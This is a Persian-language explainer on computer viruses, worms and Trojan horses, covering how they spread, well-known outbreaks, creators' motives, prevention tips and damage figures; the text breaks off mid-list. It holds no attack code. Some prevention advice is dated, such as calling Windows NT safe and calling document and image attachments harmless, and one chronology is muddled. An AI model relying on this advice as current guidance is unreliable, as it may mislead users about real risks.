ويروس های کامپيوتری از جمله موارد اسرارآميز و مرموز در دنيای  کامپيوتر بوده که توجه اغلب کاربران را  بخود  جلب می نمايد. ويروس های کامپيوتری بخوبی قدرت آسيب پذيری  سيستم های اطلاعاتی مبتنی بر کامپيوتر  را به ما نشان می دهند. يک ويروس مدرن و پيشرفته قادر به بروز آسيب های  کاملا" غيرقابل پيش بينی در اينترنت است . مثلا" ويروس مليزا (Melissa) ، که در سال 1999 متداول گرديد ، از چنان قدرت و توانی برخوردار بود که شرکت های بزرگی نظير مآيکروسافت و ساير شرکت های بزرگ  را مجبور به خاموش نمودن کامل سيستم های پست الکترونيکی نمود. ويروس "ILOVEYOU" ، که در سال 2000 رايج گرديد ، باعث آسيب های فراوان در اينترنت و شبکه های کامپيوتری گرديد.

ويروس های کامپيوتری به دو گروه عمده تقسيم می گردند. گروه اول را "ويروس های سنتی " و گروه دوم را "ويروس های مبتنی بر پست الکترونيکی " می نامند. خصوصيات ، عملکرد و نحوه پيشگيری از هر يک از گروه های  فوق  متفاوت بوده و در اين راستا لازم است ،  اطلاعات لازم در اين خصوص را کسب کرد.

انواع آلودگی

آلودگی الکترونيکی دارای اشکال منتفاوتی است . متداولترين موارد آلودگی الکترونيکی عبارتند از :

- ويروس . ويروس يک قطعه نرم افزار کوچک  بوده که بر دوش يک برنامه حقيقی حمل می گردد. مثلا" يک ويروس می تواند خود را به برنامه ای نظير واژه پرداز متصل ( الحاق ) نمايد. هر مرتبه که برنامه واژه پرداز اجراء می گردد ، ويروس نيز اجراء و اين فرصت ( شانس ) را پيدا خواهد کرد که نسخه ای از خود را مجددا" توليد ( الحاق يک نسخه از خود به ساير برنامه ها )  و يا يک خرابی عظيم را باعث گردد.

- ويروس های مبتنی بر پست الکترونيکی . ويروس هائی از اين نوع از طريق پيام های پست الکترونيکی منتقل می گردند. اين نوع ويروس ها بصورت خودکار برای افراد متعدد ، پست خواهند شد. گزينش افراد برای ارسال نامه الکترونيکی بر اساس دفترچه آدرس پست الکترونيکی ، انجام می گيرد.

- کرم ها . يک کرم ، برنامه  نرم افزاری کوچکی بوده که با استفاده از شبکه های کامپيوتری و حفره های امنيتی موجود ، اقدام به تکثير خود می نمايند. نسخه ای از "کرم " ، شبکه را پيمايش تا ماشين های ديگر موجود در شبکه را که دارای حفره های امنيتی می باشند ، تشخيص و نسخه ای از خود را تکثير نمايند. کرم ها با استناد به حفره های امنيتی موجود ، نسخه ای از خود را بر روی ماشين های جديد تکثير می نمايند.

- اسب های تراوا. يک اسب تراوا، نوع خاصی از برنامه های کامپيوتری می باشند . برنامه های فوق  اين ادعا را دارند که قادر به انجام يک عمليات خاص می باشند ( مثلا" ادعای آنان می تواند شامل يک بازی کامپيوتری باشد ). برنامه های فوق برخلاف ادعای خود نه تنها عمليات مثبتی را انجام نخواهند داد بلکه باعث بروز آسيب های جدی پس از فراهم نمودن شرايط اجراء،  می باشند. ( مثلا" ممکن است اطلاعات موجود بر روی هارد ديسک را حذف نمايند) . اسب های تراوا دارای روشی برای تکثير خود نمی باشند.

ويروس چيست ؟

ويروس های کامپيوتری بدين دليل ويروس ناميده شده اند ، چون دارای برخی وجوه مشترک با ويروس های زيست شناسی می باشند. يک ويروس کامپيوتری از کامپيوتری به کامپيوتر ديگر عبور کرده ، دقيقا" مشابه ويروس های زيست شناسی که از شخصی به شخص ديگری منتقل می گردند.

ويروس زيست شناسی يک موجود زنده نيست . ويروس بخشی از DNA  بوده و داخل يک روکش حفاظتی قرار می گيرد . ويروس بر خلاف سلول ، قادر به انجام عمليات و يا تکثير مجدد خود نمی باشد. ( ويروس زنده و در قيد حيات نمی باشد ) .يک ويروس زيست شناسی می بايست DNA خود را به يک سلول تزريق نمايد. DNA ويروسی در ادامه با استفاده از دستگاه موجود سلول ، قادر به تکثير خود می گردد. در برخی حالات ، سلول با ذرات ويروسی جديد آلوده تا زمانيکه سلول فعال  و باعث رها سازی ويروس گردد.در حالات ديگر ، ذرات ويروس جديد باعث عدم رشد سلول در هر لحظه شده و سلول همچنان زنده باقی خواهد ماند.

ويروس های کامپيوتری دارای وجوه مشترک فوق می باشند. يک ويروس کامپيوتری  می بايست بر دوش ساير برنامه ها و يا مستندات قرار گرفته تا در زمان لازم شرايط اجرای آن فراهم گردد.پس از اجرای يک ويروس ، زمينه آلوده نمودن ساير برنامه ها و يا مستندات نيز فراهم می گردد.

کرم چيست ؟

کرم ، يک برنامه کامپيوتری است که قابليت تکثير خود از ماشينی به ماشين ديگر را دارا است . شبکه های کامپيوتری بستر مناسب برای حرکت کرمها و آلوده نمودن ساير ماشين های موجود در شبکه را فراهم می آورند. با استفاده از شبکه های کامپيوتری ، کرمها قادر به تکثير باورنکردنی خود در اسرع زمان می باشند. مثلا" کرم "Code Red" ، که در سال 2001 مطرح گرديد ، قادر به تکثير خود به ميزان 250.000 مرتبه در مدت زمان نه ساعت بود. کرمها در زمان تکثير، زمان کامپيوتر و پهنای باند موجود را استفاده می نمايند.  کرم Code Red ، در زمان تکثير به ميزان قابل ملاحظه ای سرعت ترافيک اطلاعاتی بر روی اينترنت را کند می نمود. هر نسخه از کرم فوق ، پيمايش اينترنت بمنظور يافتن سرويس دهندگان ويندوز NT و يا 2000 را آغاز می کرد. هر زمان که  يک سرويس دهنده ناامن ( سرويس دهنده ای که بر روی آن آخرين نرم افزارهای امنيتی مايکروسافت نصب نشده بودند ) پيدا می گرديد ، کرم نسخه ای از خود را بر روی سرويس دهنده تکثير می کرد. نسخه جديد در ادامه عمليات پيمايش  برای يافتن ساير سرويس دهندگان را آغاز می نمايد. با توجه به تعداد سرويس دهندگان ناامن ، يک کرم قادر به ايجاد صدها و هزاران نسخه از خود است .

نحوه تکثير به چه صورت است ؟

ويروس های اوليه ، کدهائی محدود بوده که به يک برنامه متداول نظير يک بازی کامپيوتری و يا يک واژه پرداز ، الحاق می گرديدند. کاربری ، يک بازی کامپيوتری آلوده را از يک BBS اخذ و آن را اجراء می نمايد. .ويروس  ، بخش  کوچکی از نرم افزار بوده که به يک برنامه بزرگ متصل می گردد. ويروس های فوق بگونه ای طراحی شده بودند که در زمان اجرای برنامه اصلی ،  بعلت فراهم شدن شرايط  مساعد ، اجراء می گرديدند. ويروس خود را بدرون حافظه منتقل  و در ادامه بدنبال يافتن ساير برنامه های اجرائی موجود بر روی ديسک ، بود. در صورتيکه اين نوع برنامه ها ، پيدا می گرديدند ، کدهای مربوط به ويروس به برنامه  اضافه می گرديدند. در ادامه ويروس ، برنامه واقعی را فعال می کرد. کاربران از فعال شدن و اجرای  ويروس آگاه نشده و در اين راستا روش های خاصی نيز  وجود نداشت. متاسفانه ويروس،  نسخه ای از خود را تکثير و بدين ترتيب دو برنامه آلوده می گرديدند. در آينده با توجه به فراهم شدن شرايط لازم ، هر يک از برنامه های فوق  ساير برنامه ها را آلوده کرده و اين روند تکراری ادامه می يابد.

در صورتيکه يکی از برنامه های آلوده از طريق ديسکت به شخص ديگری داده شود و يا فايل آلوده برای يک BBS ارسال تا بر روی سرويس دهنده قرار گيرد ، امکان آلوده شدن ساير برنامه ها نيز فراهم خواهد شد. فرآيند فوق نحوه تکثير يک  ويروس کامپيوتری را نشان می دهد.

تکثير و گسترش  از مهمترين ويژگی های يک ويروس  کامپيوتری بوده و در صورت عدم امکان فوق ، عملا" موانع جدی در تکثير ويروس های کامپيوتری بوجود آمده و برخورد با اين نوع برنامه با توجه به ماهيت محدود ميدان عملياتی ، کار پيچيده ای نخواهد بود. يکی ديگر از ويژگی های مهم ويروس های کامپيوتری ، قابليت حملات مخرب آنان بمنظور آسيب رساندن به اطلاعات است . مرحله انجام حملات مخرب عموما" توسط نوع خاصی چاشنی ( نظير ماشه اسلحه ) صورت می پذيرد. نوع حملات متنوع بوده و از نمايش يک پيام ساده تا پاک نمودن تمام اطلاعات موجود را می تواند شامل گردد. ماشه فعال شدن ويروس می تواند بر اساس يک تاريخ خاص و يا تعداد نسخه های تکثير شده از يک ويروس باشد . مثلا" يک ويروس می تواند در تاريخ خاصی فعال و يا پس از ايجاد يکصد نسخه از خود ، فعال و حملات مخرب را آغاز نمايد.

ايجاد کنندگان ويروس های کامپيوتری افرادی آگاه و با تجربه بوده و همواره از آخرين حقه های موجود استفاده می نمايند. يکی از حقه های مهم در اين خصوص ، قابليت استقرار در حافظه و استمرار وضعيت اجرای خود در حاشيه می باشد ( ماداميکه  سيستم روشن است).  بدين ترتيب امکان تکثير اين نوع ويروس ها با شرايط مطلوبتری فراهم می گردد. يکی ديگر از حقه های موجود ، قابليت آلوده کردن  " بوت سکتور " فلاپی ديسک ها و هارد ديسک ها ، می باشد. بوت سکتور شامل يک برنامه کوچک بمنظور استقرار بخش اوليه يک سيستم عامل در حافظه است .  با استقرار ويروس های کامپيوتری در بوت سکتور ، اجراء شدن آنها تضمين خواهد شد. ( شرايط مناسب برای اجرای آنها بوجود می آيد). بدين ترتيب يک ويروس بلافاصله در حافظه مستقر و تا زمانيکه سيستم روشن باشد به حضور مخرب خود در حافظه ادامه خواهند داد. ويروس های بوت سکتور قادر به آلوده نمودن ساير بوت سکتورهای فلاپی ديسک های سالمی که دردرايو ماشين قرار خواهند گرفت ، نيز می باشد.  در مکان هائی  که کامپيوتر بصورت مشترک بين افراد استفاده می گردد ( نظير دانشگاه ها ) ، بهترين شرايط برای تکثير ويروس های کامپيوتری بوجود خواهد آمد ( نظير يک آتش سوزی بزرگ بوده که بسرعت همه چيز را نابود خواهد کرد ).

ويروس های قابل اجراء و بوت سکتور در حال حاضر تهديدی جدی تلقی نمی گردند. مهمترين علت در صحت ادعای فوق ، حجيم شدن ظرفيت برنامه های کامپيوتری است . امروزه اغلب برنامه های کامپيوتری بر روی ديسک های فشرده (CD) ذخيره و در اختيار متقاضيان قرار می گيرند. اطلاعات ذخيره شده بر روی ديسک های فشرده ، غير قابل تغيير بوده و تقريبا" آلودگی اطلاعاتی بر روی آنان غيرممکن است . استفاده از فلاپی ديسک برای توزيع و استفاده برنامه های کامپيوتری نظير آنچه که در اواسط 1980 استفاده می گرديد ، عموميت ندارد. و اين خود می تواند عاملی موثر در عدم  گسترش سريع ويروس های اجرائی و خصوصا" ويروس های بوت سکتوری باشد.

در حال حاضر امکان وجود ويروس های اجرائی و يا بوت سکتور ، همچنان نيز وجود داشته و صرفا" امکان گسترش سريع آنها سلب شده است . محيط های مبتنی بر فلاپی ديسک ها ، برنامه های کوچک و ضعف موجود در برخی از سيستم های عامل ، حضور ملموس اين نوع ويروس های کامپيوتری را در دهه 80 ميسر و توجيه پذير کرده بود.

ويروس های پست الکترونيکی

آخرين اطلاعات موجود در رابطه با ويروس های کامپيوتری به " ويروس پست الکترونيکی " اشاره دارد. عملکرد ويروس "مليزا " در سال 1999 بسيار ديدنی بود. ويروس فوق از طريق  مستندات ( سندها ) از نوع  Word شرکت مايکروسافت ، گسترش و توسط پست الکترونيکی ارسال و توزيع می گرديد. عملکرد ويروس فوق بشکل زير بود :

فردی اقدام به ايجاد يک ويروس کرده ، آن را بعنوان يک سند Word برای  " گروه های خبری اينترنت " ، ارسال می کرد. در ادامه هر فرد ديگری که فايل فوق را اخذ و آن را بر روی سيستم خود فعال می کرد ، زمينه اجراء و فعال شدن ويروس را هم فراهم می کرد. ويروس در ادامه ، سند ( بهمراه خود ويروس ) را از طريق يک پيام پست الکترونيکی برای اولين پنجاه نفر موجود در دفترچه آدرس ، ارسال می کرد. پيام الکترونيکی شامل يک متن دوستانه بهمراه نام شخص بود، بنابراين گيرنده بدون هيچگونه نگرانی اقدام به بازنمودن نامه می کرد. در ادمه ويروس ، پنجاه پيام جديد را از کامپيوتر گيرنده پيام ، ارسال می کرد. ويروس مليزا ، سريعترين ويروس از بعد گسترش تاکنون بوده است . همانگونه که در ابتدا اشاره گرديد ، عملکرد و سرعت باورنکردنی گسترش ويروس فوق باعث گرديد که تعدادی از شرکت های بزرگ ، سيستم های پست الکترونيکی خود را غيرفعال نمايند.

عملکرد ويروس ILOVEYOU ، که در سال 2000 مطرح گرديد ، بمراتب ساده تر از ويروس مليزا بود. ويروس فوق شامل کد محدودی بود که بعنوان يک Attachment ( ضميمه ) به يک پيام پست الکترونيکی متصل می شد. افراديکه پيام را دريافت می کردند با فعال نمودن ضميمه ، امکان اجرای ويروس را فراهم می کردند. کد ارسال شده در ادامه نسخه هائی از خود را تکثير و برای افراديکه نام آنها در دفترچه آدرس بود، ارسال می کرد.

ويروس مليزا از قابليت های برنامه نويسی توسط VBA)Visual Basic for Application)  که در Ms Word وجود دارد ، استفاده می کرد. VBA يک زبان برنامه نويسی کامل بوده که امکانات متعددی نظير : تغيير محتويات فايل ها و يا ارسال پيام های پست الکترونيکی را فراهم می آورد. VBA دارای يک امکان مفيد و در عين حال خطرناک با نام " اجرای خودکار " است . يک برنامه نويس قادر به درج يک برنامه درون يک سند بوده و بلافاصله پس از باز نمودن سند ، شرايط اجرای کدهای فوق فراهم خواهد شد. ويروس مليزا بدين طريق برنامه نويسی شده بود. هر شخص که سند آلوده به ويروس مليزا را فعال می نمود ، بلافاصله زمينه فعال شدن ويروس نيز فراهم می گرديد. ويروس فوق قادر به ارسال 50 پيام پست الکترونيکی بوده و در ادامه يک فايل مرکزی با نام NORMAL.DOT را آلوده تا هر فايل ديگری که در آينده ذخيره می گردد ، نيز شامل ويروس گردد.

برنامه های مايکروسافت دارای يک ويژگی خاص با نام " حفاظت ماکروها در مقابل ويروس " بوده که از فايل ها و مستندات مربوطه را در مقابل  ويروس حفاظت می نمايد. زمانيکه ويژگی فوق فعال گردد ، امکان " اجرای خودکار " ، غيرفعال می گردد. در چنين حالتی در صورتيکه يک سند سعی در اجرای خودکار کدهای ويروسی نمايد ، يک پيام هشداردهنده برروی نمايشگر ظاهر می گردد. متاسفانه ، اکثر کاربران دارای شناخت لازم و مناسب از ماکروها و ماکروهای ويروسی نبوده و بمحض مشاهد پيام هشداردهنده ، از آن چشم پوشی و صرفنظر می نمايند. در چنين مواردی ، ويروس با خيال آسوده اجراء خواهد شد.  برخی ديگر از کاربران امکان حفاظتی فوق را غير فعال نموده و ناآگاهانه در توزيع و گسترش ويروس های کامپيوتری نظير مليزا ، سهيم می گردند.

پيشگيری از ويروس

با رعايت چندين نکته ساده می توان يک پوشش مناسب ايمنی در مقابل ويروس های کامپيوتری را ايجاد کرد :

● از سيستم های عامل ايمن و مطمئن نظير : يونيکس و ويندوز NT استفاده تا پوشش حفاظتی مناسبی در مقابل ويروس های سنتی ( نقطه مقابل ويروس های پست الکترونيکی ) ايجاد گردد.

● در صورتيکه از سيستم های عامل غير مطمئن و ايمن استفاده می گردد ، سيستم خود را مسلح به يک نرم افزار حفاظتی در رابطه با ويروس ها ، نمائيد.

● از نرم افزارهائی که توسط منابع غير مطمئن توزيع و ارائه می گردند ، اجتناب و نرم افزارهای مربوطه را از منابع مطمئن تهيه و نصب نمائيد. در ضمن امکان بوت شدن از طريق فلاپی ديسک را با استفاده از برنامه BIOS ، غير فعال کرده تا بدين طريق امکان آلوده شدن ويروس از طريق يک ديسکت که بصورت تصادفی در درايو مربوطه قرار گرفته شده است ، اجتناب شود.

● امکان "حفاظت ماکرو در مقابل ويروس " را در تمام برنامه های مايکروسافت فعال نموده و هرگز امکان اجرای ماکروهای موجود در يک سند را تا حصول اطمينان از عملکرد واقعی آنها ندهيد.

● هرگز بر روی ضمائمی که بهمراه يک پيام پست الکترونيکی ارسال شده و شامل کدهای اجرائی می باشند ، کليک ننمائيد.  ضمائمی که دارای انشعاب DOC ( فايل های word) ، انشعاب XLS( صفحه گسترده ) ، تصاوير( فايل های با انشعاب GIF و يا JPG و ...) بوده ، صرفا" شامل اطلاعات بوده و خطرناک نخواهند بود ( در رابطه با فايل های word و Execl به مسئله ماکرو و ويروس های مربوطه دقت گردد ) . فايل های با انشعاب EXE,COM و يا VBS اجرائی بوده و در صورت آلوده بودن به ويروس ، با اجرای آنان بر روی سيستم خود زمينه فعال شدن آنها فرام خواهد شد.  بنابراين لازم است از اجرای هرگونه فايل اجرائی که بهمراه پست الکترونيکی برای شما ارسال می گردد ( خصوصا" موارديکه آدرس فرستنده برای شما گمنام و ناشناخنه اس )  ، صرفنظر نمائيد

با تحقق اصول فوق ، يک پوشش ايمنی مناسب در رابطه با ويروس های کامپيوتری بوجود می آيد.

علت ايجاد ويروس های کامپيوتری

انسان ويروس ها را ايجاد می نمايند. برنامه نويس مجبور به نوشتن کد لازم ، تست آن بمنظور اطمينان از انتشار مناسب آن و در نهايت رها سازی و توزيع ويروس است . برنامه نويس همچنين می بايست نحوه حملات مخرب را نيز طراحی و پياده سازی نمايد ( تبين و پياده سازی سياست حملات مخرب). چرا انسان ها دست به چنين اقداماتی زده و خالق ويروس های کامپيوتری می گردند؟

در رابطه با سوال فوق ، حداقل سه دليل وجود دارد :

● دليل اول : اولين دليل مربوط به دلايل روانی با گرايش  مخرب در وجود اين نوع افراد است . دليل فوق صرفا" به دنيای کامپيوتر برنمی گردد. مثلا" فردی بدون دليل ، شيشه اتومبيل فرد ديگری را شکسته تا اقدام به سرقت نمايد، نوشتن و پاشينن رنگ بر روی ساختمانها ، ايجاد حريق تعمدی در يک جنگل زيبا ، نمونه هائی در ساير زمينه ها بوده که بشريت به آن مبتلا است .برای برخی از افراد انجام عمليات فوق ، نوعی هيجان ايجاد می کند. در صورتيکه اين نوع اشخاص دارای توانائی لازم در رابطه با نوشتن برنامه های کامپيوتری باشند ، توان و پتانسيل خود را صرف ايجاد ويروس های مخرب خواهند کرد.

● دليل دوم : دليل دوم به هيجانات ناشی از مشاهده اعمال نادرست برمی گردد. تعدادی از افراد دارای يک شيفتگی خاص بمنظور مشاهده حوادثی نظير انفجار و تصادفات می باشند.  قطعا" در مجاورت منزل شما به افرادی برخورد می نمايد که عاشق يادگيری نحوه استفاده از باروت ( و يا ترقه ) بوده و اين روند ادامه داشته و همزمان با افزايش سن اين افراد آنها تمايل به ايجاد بمب های بزرگتر را پيدا می نمايند. فرآيند فوق تا زمانيکه فرد مورد نظر خسته شده  و يا به خود آسيبی برساند ، ادامه خواهد يافت . ايجاد يک ويروس کامپيوتری که بسرعت تکثير گردد مشابه موارد فوق است . افراديکه ويروس های کامپيوتری را ايجاد می نمايند ، بمبی درون کامپيوتر را ايجاد کرده اند و بموازات افزايش کامپيوترهای آلوده ، صدای انفجار بيشتری بگوش فرا خواهد رسيد.

● دليل سوم :  دليل سوم به حس خود بزرگ جلوه دادن و هيجانات ناشی از آن  برمی گردد. ( نظير صعود به قله اورست  ) اورست موجود است و هر فرد می تواند مدعی صعود به آن گردد. در صورتيکه برنامه نويسی يک حفره امنيتی موجود در يک سيستم را مشاهده و امکان سوءاستفاده از آن وجود داشته باشد ، سريعا" بدنبال سوءاستفاده از وضعيت فوق (قبل از اينکه سايرين اقدام  به ناکام نمودن وی را در اين زمينه داشته باشند) ، بر خواهند آمد.

متاسفانه  اکثر ايجاد کنندگان ويروس های کامپيوتری فراموش کرده اند که آنها باعث ايجاد خرابی واقعی برای افراد واقعی هستند ( هيچ چيز در خيال و رويا نمی باشد )  حذف تمام اطلاعات موجود بر روی هارد ديسک اشخاص ، يک خرابکاری واقعی و نه خيالی! است .صرف زمان زياد در يک شرکت بزرگ برای برطرف نمودن فايل های آلوده به ويروس يک خرابکاری واقعی و نه خيالی ! است. حتی ارسال يک پيام ساده و بی محتوا نيز بدليل تلف شدن زمان  ، يک نوع خرابکاری است . خوشبختانه قانون در اين زمينه سکوت نکرده  و در اين راستا قوانين لازم تصويب و مجازات های سنگين برای افراديکه ويروس های کامپيوتری را ايجاد می نمايند ، پيش بينی شده است .

تاريخچه

ويروس های سنتی کامپيوتر در اواخر 1980 بشدت گسترش يافتند. موضوع فوق دارای چندين دليل است .

● دليل اول ،  به گسترش استفاده از کامپيوترهای شخصی  برمی گردد. قبل از 1980 استفاده از کامپيوتر در منازل بسيار کم و در مواردی شامل  استفاده محدود بصورت   سرگرمی و اسباب بازی  بود. کامپيوترهای واقعی کمياب و صرفا" در اختيار متخصصين و کارشناسان مجرب گذاشته می گرديد. در سال 1980 ، استفاده از کامپيوتر بشدت گسترش و در موارد متعددی بخدمت گرفته گرديد.

● دومين دليل ، به استفاده از سيستم های BBS برمی گردد. افراد از طريق مودم به يک BBS متصل و انواع برنامه های مورد نياز خود را اخذ (Download) می کردند.  بازيهای کامپيوتری نمونه ای از برنامه های کامپيوتری بودند که بشدت با استقبال مواجه و همواره از طريق مراکز BBS توزيع و منتشر می شدند. طبيعی است آلوده بودن يکی از بازيهای کامپيوتری که علاقه مندانن زيادی داشت ، می توانست در مدت زمان کوتاهی باعث انتشار و تکثير يک ويروس کامپيوتری گردد.

● سومين دليل ، استفاده فراوان از فلاپی ديسک ها بمنظور استفاده از برنامه های کامپيوتری بود. در سال 1980 ، برنامه ها دارای ظرفيت کم بوده و امکان استقرار يک سيستم عامل ، يک واژه پرداز و مستندات فراوانی در يک و يا دو فلاپی ديسک وجود داشت . اغلب کامپيوترها در آن زمان دارای هارد ديسک نبوده و می بايست برای راه اندازی کامپيوتر از فلاپی ديسک استفاده می شد ، استفاده از فلاپی ديسک ها ، زمينه ای مساعد برای توزيع و انتشار برنامه های آلوده را فراهم می کرد.

کرم ها و ويروس ها نوع خاصی از برنامه های کامپيوتری موسوم به " کد مخرب " می باشند. علت ظهور کرم ها و ويروس ها ، وجود ضعف در برنامه ها ی کامپيوتری است  . آنان نسخه هائی از خود را تکرار و يا به ساير برنامه ها متصل، بسرعت گسترش و بسادگی از سيستمی به سيستم ديگر توزيع می شوند.درابتدا لازم است که تعريف مناسبی برای هر يک از آنان ارائه گردد . کرم ها ، نوع خاصی ازبرنامه های کامپيوتری می باشند که پس از آغاز فعاليت خود ، بدون مداخله انسانی منتشر و توزيع خواهند شد. ويروس ها ، نوع ديگری از برنامه های کامپيوتری می باشند که بمنظور انتشار و توزيع خود نيازمند انجام عمليات خاصی توسط کاربر نظير فعال شدن فايل همراه  يک نامه الکترونيکی می باشند.کاربران در اغلب موارد و در مشاهده با فايل های ضميمه همراه نامه های الکترونيکی ، اغوا و بدون لحاظ نمودن مسائل امنيتی آنان را باز و به  عاملی برای گسترش يک ويروس تبديل می شوند. کاربران بدليل کنجکاوی مربوط به موضوع يک نامه و يا ظاهر شدن نامه بگونه ای که برای مخاطب خود آشنا است ، اقدام به باز نمودن ضمائم يک نامه الکترونيکی می نمايند. کرم ها و ويروس می توانند اقدامات پيشگيرانه امنيتی نظير فايروال ها و سيستم های حفاظتی را ناديده  و اهداف خود را دنبال نمايند.
کرم ها و  ويروس ها  در مقايسه با گذشته با سرعت بمراتب بيشتری اقدام به خرابی سيستم های آسيب پذير نموده و در اين راستا نسخه هائی از خود را برای  اکثر سيستم های فوق ، توزيع و منتشر می نمايند. کامپيوترهای موجود در منازل ، نمونه مناسبی از سيستم های آسيب پذير بوده که شرايط و استعداد مناسبی را در اين رابطه دارند. کرم Code Red در سال 2001 بسرعت در سطح جهان منتشر گرديد . سرعت انتشار کرم فوق، بمراتب بيشتر از کرم Morris  در سال 1988 و ويروس مليزا در سال 1999 بود. بديهی است، افزايش سرعت انتشار اين نوع از کدهای مخرب ، سرعت در بروز خرابی و آسيب را بدنبال خواهد داشت . مثلا" فاصله زمانی بين شناسائی اولين نسخه کرم  Code Red  و خرابی گسترده آن ، صرفا" چندين روز بيشتر نبوده است و دراين فاصله زمانی محدود، Code Red بسرعت اشاعه و گسترش پيدا کرده بود. پس از گذشت يک ماه از ظهور کرم Code Red ، کرم ديگری با نام "نيمدا" توانست در اولين ساعت فعاليت خود ، خرابی بسيار گسترده ای را ايجاد نمايد . در ژانويه همان سال ، " اسلامر" توانست صرفا" در مدت  چندين دقيقه خرابی گسترده ای را بوجود آورد .
شکل زير،سرعت انتشار و ميزان آسيب رسانی  " اسلامر" ، بلستر و Code red در اولين روز فعال شدن را نشان می دهد . همانگونه که مشاهده می شود ، اسلامر توانسته است با سرعت بيشتری در اولين ساعات فعال شدن خود ، تعداد زيادی از سيستم ها را آلوده نمايد. سرعت انتشار بلستر از اسلامر کندتر ولی از Code Red سريعتر بوده است . پس از گذشت بيست و چهار ساعت، بلستر به 336،000 ، .Code Red به 265،000 و اسلامر به  55،000 دستگاه کامپيوتر آسيب رسانده بودند. دقت داشته باشيد که بلستر در هيجده ساعت اوليه فعاليت خود تواسنه است بيش از 336،000 کامپيوتر را آلوده نمايد. بلستر نسبت به اسلامر توانسته است عليرغم کند بودن انتشار  در ساعات اوليه ، تعداد بمراتب بيشتری از سيستم ها را آلوده نمايد . بنابراين ، ما از يکطرف سرعت در انتشار و از طرف ديگر افزايش بالای تعداد سيستم های آسيب پذير را می توانيم مشاهده نمائيم .

منبع : CERT.org

شکل زير، عملکرد کرم بلستر و Code Red در هيجده ساعت اوليه فعاليت آنان را نشان می دهد. در هر دو حالت  در ساعات بين سه تا پنج اوليه فعاليت ، نزديک به 100،000 کامپيوتر آلوده شده بود. سرعت انتشار و آسيب به اندازه ای سريع بوده است که اغلب مديران سيستم و کاربران زمان لازم بمنظور ايمن سازی سيستم ها پس از اعلام ضعف امنيتی را نداشته اند .

منبع : CERT.org

عملکرد  کرم ها و ويروس ها
در بهترين حالت ، کرم ها و ويروس ها  بمنزله مزاحمينی می باشند که بمنظور برخورد با آنان می بايست هزينه های زيادی صرف گردد . در بدترين حالت ، آنان بمنزله دشمنان خانمان سوزی بوده که قادرند سرمايه های اطلاعاتی را نابود و ويران نمايند. بر اساس گزارشات منتشر شده ، صرفا" در دوازده ماه گذشته ، حملات کرم ها و ويروس ها  ميليون ها دلار خسارت را متوجه سازمان ها و موسسات نموده است . براساس نظر سنجی انجام شده توسط CSI/FBI در سال 2003 ، بيش از هشتاد و دو درصد از پاسخ دهندگان  با نوع خاصی از حملات توسط ويروس ها و کرم ها برخورد داشته  که هزينه ای معادل  27،382،340 دلار صرف برطرف نمودن مشکلات مربوطه شده است . کمترين هزينه گزارش شده  40،000 دلار و بيشترين هزينه گزارش شده  بالغ بر 6،000،000 دلار بوده است . در يک نظر سنجی ديگر و در استراليا نيز نتايجی مشابه بدست آمده است . در اين نظر سنجی بيش از هشتاد درصد از پاسخ دهندگان  با نوع خاصی از حملات توسط کرم ها و يا ويروس ها مواجه بوده اند . در بررسی انجام شده توسط موسسه تحقيقاتی استراليا ، 33 % درصد از پاسخ دهندگان اعلام نموده اند که مشکل آنان در کمتراز يک روز ، 30 % اعلام نموده اند که مشکل آنان بين يک تا هفت روز و 37 % ديگر اعلام نموده اند که بيش از يک هفته صرف برطرف نمودن مشکل آنان شده است . ( برخی از سازمان ها و موسسات نيز اعلام نموده اند که مشکل آنان هرگز برطرف نشده است ) .
ميزان صدمات وخرابی گزارش شده در ارتباط با کرم بلستر، بالغ بر 525 ميليون دلار و در ارتباط با سوبيگ ( نوع F ) ، بين 500 ميليون  تا يک ميليارد دلار برآورد شده است.هزينه فوق ، شامل ازدست دادن بهره وری ، ساعات تلف شده ، عدم فروش کالا و يا خدمات و هزينه های اضافی مربوط به پهنای باند است . بر اساس اظهارات ارائه شده در نشريه اکونوميست 23 اگوست  2003 ، سوبيگ (نوع F )، مسئول يکی از شانزده نامه الکترونيکی ارسال شده بر روی اينترنت بوده است . برخی سازمان های بزرگ ، صرفا" طی يک روز بيش از 10،000 نامه الکترونيکی آلوده را دريافت نموده اند  ( در هر  6. 8 ثانيه ، يک پيام  ) . سوبيگ ، قادر به ارسال چندين نامه الکترونيکی در يک زمان بود و بدين ترتيب ضريب نفوذ و اشاعه آن بشدت بالا بود . ( هزاران پيام در يک دقيقه ) . با توجه به اينکه، سوبيگ چندين مرتبه تغيير و نسخه های جديدتری از آن ارائه می شد، برخورد و غير فعال نمودن آن با مشکل مواجه می گرديد . ( حرف F نشاندهنده نسخه شماره شش سوبيگ است ) .

وضعيت آينده
نتايج و تجارب کسب شده ، صرفا" محدود به عملکرد خاص برخی از کرم ها و ويروس ها نظير بلستر و سوبيگ بوده و ما می بايست به اين واقعيت مهم توجه نمائيم که کرم ها و ويروس ها يک تهديد جدی در رابطه با امنيت اينترنت بوده و می توانند مسائل متعدد و غيرقابل پيش بينی را در آينده برای هر يک از شهروندان حقوقی و يا حقيقی اينترنت بدنبال داشته باشند .بنابراين می توان اين ادعا را داشت که اينترنت نه تنها در حال حاضر در مقابل اينگونه حملات آسيب پذير است بلکه آسيب پذيری آن در آينده نيز قابل پيش بينی و واقعيتی غيرقابل کتمان است. کامپيوترهای موجود در سازمان ها ، موسسات دولتی و خصوصی ، مراکز تحقيقاتی ، مدارس ، دانشگاه ها در حال حاضر نسبت به ضعف های امنيتی کشف شده آسيب پذير بوده و قطعا" نسبت به ضعف هائی که در آينده مشخص می گردند، نيز آسيب پذيری خود را خواهند داشت . بنابراين ، سيستم های کامپيوتری هم در مقابل حملات در حال حاضر و هم برای حملات در آينده ، دارای استعداد لازم بمنظور پذيرش آسيب خواهند بود. بديهی است ، همزمان با افزايش وابستگی سازمان ها و موسسات دولتی و خصوصی به اينترنت ،  انجام فعاليت های تجاری، تهديدات و خطرات خاص خود را بدنبال خواهد داشت .

محدوديت راه حل های واکنشی 
پس از گذشت قريب به پانزده سال از عموميت يافتن اينترنت و مطالعات گسترده انجام شده بمنظور کاهش خطرات ، خرابی و سرعت در تشخيص و غلبه بر حملات ، می توان اين ادعا را نمود که راه حل های واکنشی به تنهائی کافی نخواهند بود. ادعای فوق ، ماحصل توجه به عوامل زير است :

• اينترنت در حال حاضر بيش از 171،000،000 کامپيوتر را بيديگر متصل و رشد آن همچنان ادامه دارد . در حال حاضر ، ميليون ها کامپيوتر آسيب پذير در اينترنت وجود دارد که مستعد يک نوع خاص از حملات توسط مهاجمين می باشند.
